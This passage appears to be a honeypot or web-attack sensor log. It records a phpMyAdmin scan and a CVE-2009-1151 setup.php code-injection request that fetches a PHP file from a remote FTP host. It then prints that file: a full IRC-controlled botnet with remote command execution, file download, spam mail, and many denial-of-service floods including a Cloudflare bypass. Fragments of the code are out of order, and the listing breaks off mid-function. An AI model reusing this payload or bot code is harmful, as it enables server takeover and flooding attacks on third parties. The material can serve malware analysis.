$this->privmsg($this->config['chan'], "[\2HttpFlood Finished!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Started!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Finished (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TCP Started!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2TCP Finished!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2Started Slowread!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2Finished Slowread\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2SlowLoris Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2SlowLoris Finished!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2synFlood Started!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2SynFlood Finished!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "4,1 [#FLOOD] -> 9,1Atacul a fost initiat!");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "4,1 [#FLOOD] -> 9,1Atac terminat cu succes: 12" . $env . " MB trimisi / Medie: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2#TKH -> !\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2TcpFlood Finished!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
phpMyAdmin scanner
[Attack info]
Attacker:
106.12.112.59
Dest. port: 80
Time: 17/02/2019 02:05:06
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS38365 Beijing Baidu Netcom Science and Technology Co., Ltd.
Location: Beijing, Beijing
Description
This module detects attackers who try to detect phpMyAdmin installations.CVE
N/AAuthor
UnknownReference
N/APlugin ID
1a0271bb9ff236c3d3a42b4bcb0751f5GET /phpmyadmin/index.php HTTP/1.1
Host: 21.171.51.29
cache-control: no-cache
connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Resource ( 1 / 0 )
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.216.174.175
Dest. port: 80
Time: 17/02/2019 01:51:09
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS24940 Hetzner Online GmbH
Location: Newland, Helsinki (zipcode 00100)
rDNS: static.175.174.216.95.clients.your-server.de
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 241
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A32%3A%22ftp%3A%2F%2F51%2E38%2E119%2E192%2Fpub%2Fpbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 2be6db19e83a9cd7b4923319ce60c662
Type: text/x-php
Size: 39364
URL: ftp://51.38.119.192/pub/pbot.php
<?php
$cfg = array(
"server" => "51.38.119.192",
"port" => "6667",
"key" => "",
"prefix" => "Zombie",
"maxrand" => "8",
"chan" => "#exploitation",
"trigger" => ".",
"hostauth" => "ddos"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - CloudFlare - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2IRC SCHIAVI - PROXYHTTP - STO LANCIANDO BOMBE ATOMICHE SUL BERSAGLIO!!!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2IRC TERRORIST - HTTP - BOMBE LANCIATE SUL BERSAGLIO, NON CREDO SIANO ANCORA VIVI!!! (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
